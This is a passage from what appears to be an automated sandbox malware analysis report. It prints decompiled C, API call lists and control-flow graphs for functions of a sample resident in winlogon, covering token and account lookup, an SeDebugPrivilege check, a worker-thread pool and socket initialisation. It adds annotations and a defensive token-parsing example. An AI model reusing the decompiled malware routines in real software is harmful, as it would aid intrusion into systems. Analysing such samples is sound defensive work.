    • GetTokenInformation.KERNELBASE(?,00000001(TokenUser),00000000,00000000,?), ref: 00D62873
    • GetTokenInformation.KERNELBASE(?,00000001(TokenUser),00000000,00000000,00000000,?), ref: 00D628A6
    • IsValidSid.ADVAPI32(00000000,?,TokenUser,00000000,00000000,00000000,?), ref: 00D628B2
    • GetLengthSid.ADVAPI32(00000000,?,TokenUser,00000000,00000000,00000000,?), ref: 00D628BE
    • CopySid.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 00D628DD
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd

    Control-flow Graph (rendered graph not preserved; legend: Executed / Not Executed). The extracted node and edge list follows: nodes as `id start-end [APIs called]`, edges as `from->to`.
    control_flow_graph 597 d62d30-d62d58 call d61a30 600 d62d6b-d62d96 GetCurrentProcess call d61a30 597->600 601 d62d5a-d62d6a call d6abe4 597->601 600->601 606 d62d98-d62daa OpenProcessToken 600->606 606->601 607 d62dac-d62db4 606->607 607->601 608 d62db6-d62dc6 call d62820 607->608 610 d62dcb-d62dcd 608->610 610->601 611 d62dcf-d62e01 call d6d520 call d62650 610->611 616 d62e19-d62e1b 611->616 617 d62e03-d62e06 611->617 618 d62e2f-d62e38 616->618 619 d62e1d-d62e2e call d6abe4 616->619 617->616 620 d62e08-d62e0e 617->620 623 d62e40-d62e49 618->623 620->616 622 d62e10-d62e16 call d7009a 620->622 622->616 623->623 625 d62e4b-d62e58 623->625 628 d62e60-d62e69 625->628 628->628 629 d62e6b-d62eac call d68b60 call d6abe4 628->629
    C-Code - Quality: 79%
    			E00D62D30(WCHAR** __ecx, void* __edi, void* __esi, void* __eflags) {
    				signed int _v8;
    				char _v532;
    				char _v1052;
    				void* _v1056;
    				signed int _v1060;
    				signed int _t21;
    				void* _t23;
    				signed int _t26;
    				signed int _t30;
    				signed int _t31;
    				signed int _t34;
    				signed int _t35;
    				signed int _t36;
    				WCHAR* _t37;
    				signed int _t49;
    				intOrPtr* _t50;
    				signed int _t51;
    				signed int _t52;
    				void* _t60;
    				void* _t63;
    				intOrPtr* _t64;
    				WCHAR** _t69;
    				signed int _t71;
    				void* _t72;
    				signed int _t75;
    				void* _t76;
    				void* _t77;
    				void* _t78;
    				void* _t79;
    
    				_t21 =  *0xd88004; // 0x276b9783
    				_v8 = _t21 ^ _t75;
    				_t69 = __ecx;
    				_push(0xdeefbad7);
    				_t23 = E00D61A30(0, __ecx);
    				_t77 = _t76 + 0xc;
    				if(_t23 != 0) {
    					_v1056 = 0xffffffff;
    					_t60 = GetCurrentProcess();
    					_push(0xdeefbad7);
    					_push( &_v1056);
    					_t26 = E00D61A30(0, _t60);
    					_t78 = _t77 + 0x10;
    					__eflags = _t26;
    					if(_t26 == 0) {
    						goto L1;
    					} else {
    						_t30 = OpenProcessToken(_t60, 8,  &_v1056); // 8 = TOKEN_QUERY on the current process
    						__eflags = _t30;
    						if(_t30 == 0) {
    							goto L1;
    						} else {
    							_t47 = _v1056;
    							__eflags = _v1056;
    							if(_v1056 == 0) {
    								goto L1;
    							} else {
    								_v1060 = 0;
    								_t31 = E00D62820(_t47,  &_v1060); // executed
    								__eflags = _t31;
    								if(_t31 == 0) {
    									goto L1;
    								} else {
    									E00D6D520(_t69,  &_v1052, 0, 0x414);
    									_t79 = _t78 + 0xc;
    									_t34 = E00D62650(_v1060,  &_v1052, __eflags);
    									_t49 = _v1060;
    									_t71 = _t34;
    									__eflags = _t49;
    									if(_t49 != 0) {
    										__eflags = _t49 - 0xffffffff;
    										if(_t49 != 0xffffffff) {
    											__eflags = _t49 - 0xcccccccc;
    											if(_t49 != 0xcccccccc) {
    												E00D7009A(_t49);
    												_t79 = _t79 + 4;
    											}
    										}
    									}
    									__eflags = _t71;
    									if(_t71 != 0) {
    										_t50 =  &_v1052;
    										_t63 = _t50 + 2;
    										do {
    											_t35 =  *_t50;
    											_t50 = _t50 + 2;
    											__eflags = _t35;
    										} while (_t35 != 0);
    										_t51 = _t50 - _t63;
    										__eflags = _t51;
    										_t64 =  &_v532;
    										_t52 = _t51 >> 1;
    										_t72 = _t64 + 2;
    										do {
    											_t36 =  *_t64;
    											_t64 = _t64 + 2;
    											__eflags = _t36;
    										} while (__eflags != 0);
    										_t37 = E00D68B60(_t52 + (_t64 - _t72 >> 1) + 0x10, __eflags);
    										 *_t69 = _t37;
    										wsprintfW(_t37, L"%ls\\%ls",  &_v532,  &_v1052); // "%ls\\%ls": account string assembled from the two LookupAccountSidW output buffers filled by E00D62650
    										__eflags = _v8 ^ _t75;
    										return E00D6ABE4(_v8 ^ _t75);
    									} else {
    										__eflags = _v8 ^ _t75;
    										return E00D6ABE4(_v8 ^ _t75);
    									}
    								}
    							}
    						}
    					}
    				} else {
    					L1:
    					return E00D6ABE4(_v8 ^ _t75);
    				}
    			}
    [Per-line address column for the listing above (0x00d62d39 to 0x00d62eac) omitted; the call sites are given by the 'ref:' addresses under APIs.]

    APIs
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    • GetCurrentProcess.KERNEL32 ref: 00D62D75
    • OpenProcessToken.ADVAPI32(?,00000008,FFFFFFFF), ref: 00D62DA2
      • Part of subcall function 00D62820: GetTokenInformation.KERNELBASE(?,00000001(TokenUser),00000000,00000000,?), ref: 00D62873
      • Part of subcall function 00D62820: GetTokenInformation.KERNELBASE(?,00000001(TokenUser),00000000,00000000,00000000,?), ref: 00D628A6
      • Part of subcall function 00D62820: IsValidSid.ADVAPI32(00000000,?,TokenUser,00000000,00000000,00000000,?), ref: 00D628B2
      • Part of subcall function 00D62820: GetLengthSid.ADVAPI32(00000000,?,TokenUser,00000000,00000000,00000000,?), ref: 00D628BE
      • Part of subcall function 00D62820: CopySid.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 00D628DD
      • Part of subcall function 00D62650: LookupAccountSidW.ADVAPI32(00000000,?,?,00000103,?,?,?), ref: 00D626A1
    • wsprintfW.USER32 ref: 00D62E8F
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd

    Control-flow Graph (rendered graph not preserved; legend: Executed / Not Executed). The extracted node and edge list follows: nodes as `id start-end [APIs called]`, edges as `from->to`.
    control_flow_graph 635 d62a60-d62a6b 636 d62a6d-d62a73 635->636 637 d62a81 635->637 636->637 639 d62a75-d62a78 636->639 638 d62a83-d62a9d call d61a30 637->638 643 d62a9f-d62aa5 638->643 644 d62aa6-d62ac7 LookupPrivilegeValueW 638->644 639->637 640 d62a7a-d62a7f 639->640 640->638 644->643 645 d62ac9-d62ae3 644->645 645->643 647 d62ae5-d62aea 645->647 647->643 648 d62aec-d62afa call d702c9 647->648 651 d62afc-d62b01 648->651 652 d62b02-d62b0f 648->652 653 d62b16-d62b18 652->653 654 d62b66-d62b69 653->654 655 d62b1a-d62b29 653->655 656 d62b6b-d62b71 654->656 657 d62b7c-d62b84 654->657 658 d62b61 655->658 659 d62b2b-d62b2e 655->659 656->657 660 d62b73-d62b79 call d7009a 656->660 658->654 661 d62b30-d62b37 659->661 660->657 663 d62b44-d62b4a 661->663 664 d62b39-d62b42 661->664 663->661 666 d62b4c 663->666 664->663 667 d62b4e-d62b5f 664->667 666->658 667->658
    C-Code - Quality: 82%
    			E00D62A60(void* __ecx, void** _a4) {
    				long _v8;
    				struct _LUID _v16;
    				signed int _t25;
    				int _t31;
    				long _t32;
    				void* _t33;
    				int _t35;
    				signed int _t47;
    				void** _t49;
    				signed int _t51;
    				intOrPtr* _t52;
    				void* _t53;
    				void _t54;
    				void* _t56;
    
    				_t50 = __ecx;
    				_t53 = __ecx;
    				if(__ecx == 0 || __ecx == 0xcccccccc || __ecx == 0xffffffff) {
    					_t25 = 0;
    				} else {
    					_t25 = 1;
    				}
    				_push(0xdeefbad7);
    				_push(_a4);
    				_push(L"SeDebugPrivilege");
    				if(E00D61A30(0, _t25) != 0) {
    					_v16.LowPart = 0;
    					_v16.HighPart = 0;
    					if(LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16) == 0) {
    						goto L6;
    					} else {
    						_v8 = 0;
    					_t31 = GetTokenInformation(_t53, 3, 0, 0,  &_v8); // executed; 3 = TokenPrivileges, first call only sizes the buffer
    						if(_t31 != 0) {
    							goto L6;
    						} else {
    							_t32 = _v8;
    							if(_t32 == 0) {
    								goto L6;
    							} else {
    								_push(_t32);
    								_t33 = E00D702C9(_t50);
    								_t56 = _t33;
    								if(_t56 != 0) {
    									_t47 = 0;
    									_t35 = GetTokenInformation(_t53, 3, _t56, _v8,  &_v8); // executed; TokenPrivileges: *_t56 = PrivilegeCount, entries follow at +4
    									if(_t35 != 0) {
    										_t49 = _a4;
    										_t51 = 0;
    										 *_t49 = 0;
    										_t54 =  *_t56;
    										if(_t54 != 0) {
    											_t11 = _t56 + 4; // 0x4
    											_t52 = _t11;
    											while(_v16.LowPart !=  *_t52 ||  &_v16->HighPart !=  *((intOrPtr*)(_t52 + 4))) {
    												_t51 = _t51 + 1;
    												_t52 = _t52 + 0xc; // stride 0xc = sizeof(LUID_AND_ATTRIBUTES): LUID (8 bytes) + Attributes (4 bytes)
    												if(_t51 < _t54) {
    													continue;
    												} else {
    												}
    												goto L20;
    											}
    											 *_t49 = (0 | ( *(_t56 + 0xc + (_t51 + _t51 * 2) * 4) & 0x00000003) != 0x00000000) + 1; // Attributes & (SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED): 2 = SeDebugPrivilege enabled, 1 = present but disabled (0 = not in token)
    										}
    										L20:
    										_t47 = 1;
    									}
    									if(_t56 != 0xffffffff && _t56 != 0xcccccccc) {
    										E00D7009A(_t56);
    									}
    									return _t47;
    								} else {
    									return _t33;
    								}
    							}
    						}
    					}
    				} else {
    					L6:
    					return 0;
    				}
    			}
    [Per-line address column for the listing above (0x00d62a60 to 0x00d62b84) omitted; the call sites are given by the 'ref:' addresses under APIs.]

    APIs
    • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00D62ABF
    • GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenPrivileges),00000000,00000000,FFFFFFFF), ref: 00D62ADB
    • GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenPrivileges),00000000,00000000,00000000), ref: 00D62B10
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
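    The privilege check in E00D62A60 above walks the TOKEN_PRIVILEGES buffer by hand: a DWORD count, then 12-byte LUID_AND_ATTRIBUTES entries, with Attributes masked by 3 to decide between "present" and "enabled". The portable C below is an added example, not code from the sample or from Joe Sandbox: it re-implements that walk over a constructed TOKEN_PRIVILEGES buffer so it runs without Windows (on Windows the buffer would come from GetTokenInformation(hToken, TokenPrivileges, ...) and the LUID from LookupPrivilegeValueW(NULL, L"SeDebugPrivilege", ...)). The names privilege_state, build_token_privileges, priv_entry_t and the demo_* functions are this example's own; the LUID value 20 is the documented SE_DEBUG_PRIVILEGE constant. Unlike the sample, the parser bounds-checks the buffer before trusting PrivilegeCount.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Added example (not the sample's code). On-the-wire TOKEN_PRIVILEGES layout as
   GetTokenInformation(TokenPrivileges) returns it and as the decompiled loop reads it:
     DWORD PrivilegeCount;                 at +0
     LUID_AND_ATTRIBUTES Privileges[];     at +4, 12 bytes each:
       DWORD LowPart; LONG HighPart; DWORD Attributes;   (Attributes at +0xc+12*i) */
#define SE_PRIVILEGE_ENABLED_BY_DEFAULT 0x00000001u
#define SE_PRIVILEGE_ENABLED            0x00000002u
#define SE_DEBUG_PRIVILEGE_LUID         20u   /* well-known LUID of SeDebugPrivilege */

typedef struct { uint32_t low; int32_t high; uint32_t attributes; } priv_entry_t;

static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static void     wr32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }

/* Serialise entries into the TOKEN_PRIVILEGES layout. Returns bytes written, 0 if cap is too small. */
size_t build_token_privileges(uint8_t *out, size_t cap, const priv_entry_t *e, uint32_t n) {
    size_t need = 4 + (size_t)n * 12;
    if (cap < need) return 0;
    wr32(out, n);
    for (uint32_t i = 0; i < n; i++) {
        uint8_t *p = out + 4 + (size_t)i * 12;
        wr32(p, e[i].low);
        wr32(p + 4, (uint32_t)e[i].high);
        wr32(p + 8, e[i].attributes);
    }
    return need;
}

/* Same contract as the sample's out-parameter *_a4:
     0  privilege not in the token
     1  present but not enabled
     2  present and enabled (SE_PRIVILEGE_ENABLED or ENABLED_BY_DEFAULT)
    -1  malformed buffer (the sample trusts PrivilegeCount blindly; a parser should not) */
int privilege_state(const uint8_t *buf, size_t len, uint32_t luid_low, int32_t luid_high) {
    if (buf == NULL || len < 4) return -1;
    uint32_t count = rd32(buf);
    if ((size_t)count > (len - 4) / 12) return -1;      /* overflow-safe bounds check */
    for (uint32_t i = 0; i < count; i++) {
        const uint8_t *p = buf + 4 + (size_t)i * 12;
        if (rd32(p) == luid_low && (int32_t)rd32(p + 4) == luid_high) {
            uint32_t attr = rd32(p + 8);
            return ((attr & (SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED)) != 0) + 1;
        }
    }
    return 0;
}

/* Constructed sample tokens (not captured from the sandbox run). */
static int demo_with(uint32_t debug_attr, int include_debug) {
    priv_entry_t e[3] = {
        { 23, 0, SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED }, /* SeChangeNotifyPrivilege */
        { SE_DEBUG_PRIVILEGE_LUID, 0, debug_attr },                         /* SeDebugPrivilege */
        { 19, 0, 0 },                                                       /* SeShutdownPrivilege, disabled */
    };
    if (!include_debug) e[1] = e[2];                      /* drop SeDebugPrivilege from the token */
    uint8_t buf[4 + 3 * 12];
    size_t n = build_token_privileges(buf, sizeof buf, e, include_debug ? 3u : 2u);
    return privilege_state(buf, n, SE_DEBUG_PRIVILEGE_LUID, 0);
}

int demo_debug_disabled(void) { return demo_with(0, 1); }                     /* -> 1 */
int demo_debug_enabled(void)  { return demo_with(SE_PRIVILEGE_ENABLED, 1); } /* -> 2 */
int demo_debug_absent(void)   { return demo_with(0, 0); }                     /* -> 0 */
int demo_truncated(void) {                                                    /* -> -1 */
    uint8_t b[4]; wr32(b, 5);                             /* claims 5 entries, carries none */
    return privilege_state(b, sizeof b, SE_DEBUG_PRIVILEGE_LUID, 0);
}

int main(void) {
    printf("disabled=%d enabled=%d absent=%d truncated=%d\n",
           demo_debug_disabled(), demo_debug_enabled(), demo_debug_absent(), demo_truncated());
    return 0;
}
```

    The result 2 is what the sample is looking for before it proceeds: an already enabled SeDebugPrivilege, which only an elevated administrator or a service token normally carries, so this call site is a cheap "am I privileged enough to open other processes" probe rather than an attempt to enable the privilege (no AdjustTokenPrivileges appears in this function's API list).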

    Control-flow Graph (rendered graph not preserved; legend: Executed / Not Executed). The extracted node and edge list follows: nodes as `id start-end [APIs called]`, edges as `from->to`.
    control_flow_graph 668 d67680-d6768d 669 d67696-d6769b 668->669 670 d6768f-d67695 668->670 669->670 671 d6769d-d676b3 call d702c9 669->671 674 d676b5-d676ba 671->674 675 d676bb-d676d4 call d6d520 671->675 678 d676d6-d67701 CreateEventA 675->678 679 d67751-d67771 WaitForMultipleObjects call d67cb0 675->679 681 d67703-d67708 678->681 682 d67772-d67789 call d67cb0 678->682 681->682 683 d6770a-d6770d 681->683 683->682 686 d6770f-d67749 CreateThread WaitForSingleObject CloseHandle 683->686 686->682 688 d6774b-d6774f 686->688 688->678 688->679
    C-Code - Quality: 87%
    			E00D67680(void __ecx) {
    				struct _SECURITY_ATTRIBUTES* _v8;
    				long _v12;
    				intOrPtr _v16;
    				void* _v20;
    				void _v24;
    				void* __ebx;
    				void* __edi;
    				signed int _t25;
    				intOrPtr _t27;
    				void* _t33;
    				void* _t38;
    				long _t39;
    				signed int _t42;
    				void _t49;
    
    				_t49 = __ecx;
    				if( *((intOrPtr*)(__ecx + 0x30)) != 0) {
    					_t25 =  *(__ecx + 0x24);
    					if(_t25 == 0) {
    						goto L1;
    					} else {
    						_t51 = _t25 * 4;
    						_push(_t25 * 4);
    						_t27 = E00D702C9(__ecx);
    						 *((intOrPtr*)(__ecx + 0x28)) = _t27;
    						if(_t27 != 0) {
    							E00D6D520(__ecx, _t27, 0, _t51);
    							_t42 = 0;
    							_v8 = 1;
    							if( *(_t49 + 0x24) <= 0) {
    								L11:
    								WaitForMultipleObjects( *(_t49 + 0x24),  *(_t49 + 0x28), 1, 0xffffffff); // bWaitAll = 1, INFINITE: block until every worker thread exits
    								E00D67CB0(_t42, _t49, _t49);
    								return _v8;
    							} else {
    								while(1) {
    									asm("xorps xmm0, xmm0");
    									asm("movq [ebp-0x10], xmm0");
    									_v12 = 0;
    									_v24 = _t49;
    									_v16 =  *((intOrPtr*)(_t49 + 0x34));
    									_t33 = CreateEventA(0, 1, 0, 0);
    									_v20 = _t33;
    									if(_t33 == 0 || _t33 == 0xcccccccc || _t33 == 0xffffffff) { // 0xffffffff = INVALID_HANDLE_VALUE; 0xcccccccc = MSVC debug uninitialised-stack fill, checked throughout the sample
    										break;
    									}
    									_t38 = CreateThread(0, 0x100000, E00D67D40,  &_v24, 0,  &_v12); // executed; 1 MiB stack, worker gets a pointer to the stack-local _v24 struct and signals _v20 once it has copied it
    									( *(_t49 + 0x28))[_t42] = _t38;
    									_t39 = WaitForSingleObject(_v20, 0xffffffff);
    									CloseHandle(_v20);
    									if(_t39 != 0) {
    										break;
    									} else {
    										_t42 = _t42 + 1;
    										if(_t42 <  *(_t49 + 0x24)) {
    											continue;
    										} else {
    											goto L11;
    										}
    									}
    									goto L13;
    								}
    								_v8 = 0;
    								E00D67CB0(_t42, _t49, _t49);
    								return _v8;
    							}
    						} else {
    							return _t27;
    						}
    					}
    				} else {
    					L1:
    					return 0;
    				}
    				L13:
    			}
    [Per-line address column for the listing above (0x00d67687 to 0x00d67789) omitted; the call sites are given by the 'ref:' addresses under APIs.]

    APIs
    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,?,?), ref: 00D676F6
    • CreateThread.KERNEL32(00000000,00100000,Function_00007D40,?,00000000,00000000), ref: 00D67725
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D67736
    • CloseHandle.KERNEL32(?), ref: 00D67741
    • WaitForMultipleObjects.KERNEL32(00000000,000007D0,00000001,000000FF), ref: 00D6775B
      • Part of subcall function 00D67CB0: TerminateThread.KERNEL32(?,00000001,00000000,?,?,00D67768,?,?,?,00000000,?,?,?,00D655C6), ref: 00D67CE9
      • Part of subcall function 00D67CB0: CloseHandle.KERNEL32(00000000), ref: 00D67CF1
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 93%
    			E00D67D40(char _a4) {
    				intOrPtr _v8;
    				void* _v16;
    				intOrPtr* _v20;
    				char _t21;
    				void* _t23;
    				intOrPtr _t43;
    				intOrPtr* _t46;
    				intOrPtr* _t51;
    				struct _CRITICAL_SECTION* _t57;
    				void* _t58;
    				void* _t59;
    
    				_t21 = _a4;
    				_t59 = _t58 - 0x10;
    				if(_t21 != 0) {
    					asm("movq xmm0, [eax]");
    					asm("movq [ebp-0x10], xmm0");
    					_v8 =  *((intOrPtr*)(_t21 + 8));
    					_t23 = _v16;
    					if(_t23 != 0 && _t23 != 0xcccccccc && _t23 != 0xffffffff) {
    						SetEvent(_t23);
    					}
    					_t51 = _v20;
    					while(1) {
    						_t43 =  *((intOrPtr*)(_t51 + 0x2c));
    						if(_t43 == 0 && ( *((intOrPtr*)(_t51 + 4)) -  *_t51 & 0xfffffffc) == 0) {
    							break;
    						}
    						_t46 =  *_t51;
    						_a4 = 0;
    						if( *((intOrPtr*)(_t51 + 4)) - _t46 >> 2 == 0) {
    							if(_t43 == 0) {
    								return 1;
    							} else {
    								Sleep(0x64); // 100 ms poll while the queue is empty
    								continue;
    							}
    						} else {
    							_t57 = _t51 + 0xc;
    							_a4 =  *_t46;
    							EnterCriticalSection(_t57);
    							_t15 =  *_t51 + 4; // 0x4
    							E00D6BCB0( *_t51, _t15,  *((intOrPtr*)(_t51 + 4)) - _t15);
    							 *((intOrPtr*)(_t51 + 4)) =  *((intOrPtr*)(_t51 + 4)) + 0xfffffffc;
    							_t59 = _t59 + 0xc;
    							LeaveCriticalSection(_t57);
    							 *((intOrPtr*)( *((intOrPtr*)(_t51 + 0x30))))( &_a4, _v8); // executed; per-item callback stored at this+0x30, invoked with the dequeued item and the context copied from the start struct
    							Sleep(0x64);
    							continue;
    						}
    						goto L15;
    					}
    					return 0;
    				} else {
    					return 1;
    				}
    				L15:
    			}
    [Per-line address column for the listing above (0x00d67d43 to 0x00d67e1d) omitted; the call sites are given by the 'ref:' addresses under APIs.]

    APIs
    • SetEvent.KERNEL32(?), ref: 00D67D7B
    • EnterCriticalSection.KERNEL32(?), ref: 00D67DC1
    • LeaveCriticalSection.KERNEL32(?), ref: 00D67DE1
    • Sleep.KERNEL32(00000064), ref: 00D67DF5
    • Sleep.KERNEL32(00000064), ref: 00D67DFF
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 51%
    			E00D66500(int __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				signed int _v12;
    				signed int _v24;
    				signed int _v44;
    				char _v1036;
    				char _v1068;
    				short _v2060;
    				void* _t31;
    				void* _t33;
    				void* _t35;
    				signed int _t47;
    				signed int _t51;
    				signed int _t52;
    				long _t61;
    				intOrPtr _t62;
    				signed int _t63;
    				signed int _t64;
    				signed int _t67;
    				signed int _t68;
    				signed int _t78;
    				void* _t79;
    				signed int _t87;
    				signed int _t88;
    				signed int _t91;
    				signed int _t92;
    				signed int _t97;
    				signed int _t99;
    				signed int _t104;
    				signed int _t106;
    				intOrPtr* _t109;
    				signed int _t112;
    				void* _t114;
    				signed int _t118;
    				signed int _t120;
    				signed int _t123;
    				signed int _t125;
    				void* _t127;
    				void* _t128;
    				signed int _t129;
    				signed int _t131;
    				void* _t134;
    
    				_t73 = __ebx;
    				_t109 = __ecx; // executed
    				_t31 = E00D70058(__ecx, __edx, __eflags, 0); // executed
    				E00D6E328(__ecx, _t31);
    				_t128 = _t127 + 8;
    				_t33 = __ecx + 0x24;
    				__imp__#115(0x202, _t33, __edi); // executed; ws2_32.dll ordinal 115 = WSAStartup(MAKEWORD(2,2), &WSADATA at this+0x24)
    				if(_t33 == 0) {
    					_push(__esi);
    					_t129 = _t128 - 8;
    					E00D62340(__ebx, __ecx, __ecx, __esi); // executed
    					_t35 = 0;
    					_t118 =  *((intOrPtr*)(__ecx + 4)) -  *__ecx;
    					_t97 = _t118 >> 9;
    					__eflags = _t97;
    					if(_t97 == 0) {
    						L7:
    						GetModuleFileNameA(GetModuleHandleA(0), _t109 + 0xdb4, 0x3ff); // executed; stores the sample's own path at this+0xdb4
    						E00D62B90(_t73, _t109, _t118); // executed
    						E00D660F0(_t73, _t109, _t109, _t118); // executed
    						return 1;
    					} else {
    						do {
    							__eflags = _t35 - 0xffffff;
    							if(_t35 > 0xffffff) {
    								goto L6;
    							} else {
    								_t78 = _t118 >> 9;
    								__eflags = _t35 - _t78;
    								if(_t35 >= _t78) {
    									goto L6;
    								} else {
    									__eflags = _t97 - _t35;
    									if(_t97 <= _t35) {
    										E00D6B97B("invalid vector<T> subscript"); // MSVC STL range-check throw (std::vector::operator[] in a debug/checked build); the int3 padding below marks the end of this function and the decompiler has merged the following function into this listing
    										asm("int3");
    										asm("int3");
    										asm("int3");
    										asm("int3");
    										asm("int3");
    										asm("int3");
    										asm("int3");
    										asm("int3");
    										asm("int3");
    										_t123 = _t129;
    										_t131 = (_t129 & 0xfffffff8) - 8;
    										_push(_t118);
    										_t120 = _t78;
    										_push(_t109);
    										__eflags =  *(_t120 + 0x15c8);
    										if( *(_t120 + 0x15c8) != 0) {
    											_v24 = 0;
    											_t67 = E00D63230(_t73, 0x65, _t109, _t120, _t78,  &_v24); // executed
    											_t131 = _t131 + 8;
    											__eflags = _t67;
    											if(_t67 != 0) {
    												_t106 = _v24;
    												__eflags = _t106;
    												if(_t106 != 0) {
    													_t91 = _t106;
    													_t109 = _t91 + 2;
    													do {
    														_t68 =  *_t91;
    														_t91 = _t91 + 2;
    														__eflags = _t68;
    													} while (_t68 != 0);
    													_t92 = _t91 - _t109;
    													__eflags = _t92;
    													if(_t92 != 0) {
    														E00D63920(_t73, _t120, _t120 + 0x13b4, _t109, _t120, _t120 + 0x11b4, _t120 + 0x12b4, _t106);
    														_t131 = _t131 + 0xc;
    													}
    												}
    											}
    										}
    										__eflags =  *(_t120 + 0x15c0);
    										if( *(_t120 + 0x15c0) != 0) {
    											_t62 =  *((intOrPtr*)(_t120 + 0x15b4));
    											__eflags = _t62 - 0x20;
    											if(_t62 == 0x20) {
    												L19:
    												_v24 = 0;
    												__eflags = _t62 - 0x20;
    												_t63 = E00D63230(_t73, (0 | _t62 != 0x00000020) + 0x66, _t109, _t120,  &_v24,  &_v24); // executed
    												_t131 = _t131 + 8;
    												__eflags = _t63;
    												if(_t63 != 0) {
    													_t104 = _v24;
    													__eflags = _t104;
    													if(_t104 != 0) {
    														_t87 = _t104;
    														_t114 = _t87 + 2;
    														do {
    															_t64 =  *_t87;
    															_t87 = _t87 + 2;
    															__eflags = _t64;
    														} while (_t64 != 0);
    														_t88 = _t87 - _t114;
    														__eflags = _t88;
    														if(_t88 != 0) {
    															E00D63B90(_t73, _t120, _t104, _t114, _t120);
    														}
    													}
    												}
    											} else {
    												__eflags = _t62 - 0x40;
    												if(_t62 == 0x40) {
    													goto L19;
    												}
    											}
    										}
    										_t79 = 0;
    										_t112 =  *((intOrPtr*)(_t120 + 4)) -  *_t120;
    										_t99 = _t112 >> 9;
    										__eflags = _t99;
    										if(_t99 == 0) {
    											L30:
    											return 1;
    										} else {
    											do {
    												__eflags = _t79 - 0xffffff;
    												if(_t79 > 0xffffff) {
    													goto L29;
    												} else {
    													__eflags = _t79 - _t112 >> 9;
    													if(_t79 >= _t112 >> 9) {
    														goto L29;
    													} else {
    														__eflags = _t99 - _t79;
    														if(_t99 <= _t79) {
    															E00D6B97B("invalid vector<T> subscript");
    															// editor's note: same situation as above: the int3 bytes are padding and what follows (stack-cookie prologue, GetFileAttributesA, GetModuleFileNameW, ExitProcess) is yet another function merged in by the decompiler, not a continuation of this loop.
    															asm("int3");
    															asm("int3");
    															asm("int3");
    															asm("int3");
    															asm("int3");
    															asm("int3");
    															asm("int3");
    															asm("int3");
    															asm("int3");
    															_push(_t123);
    															_t125 = _t131;
    															_t47 =  *0xd88004; // 0x276b9783
    															_v44 = _t47 ^ _t125;
    															E00D6D520(_t112,  &_v1068, 0, 0x400);
    															_t134 = _t131 - 0x804 + 0xc;
    															_t51 = E00D65770(_t73,  &_v1068, _t112, _t120); // executed
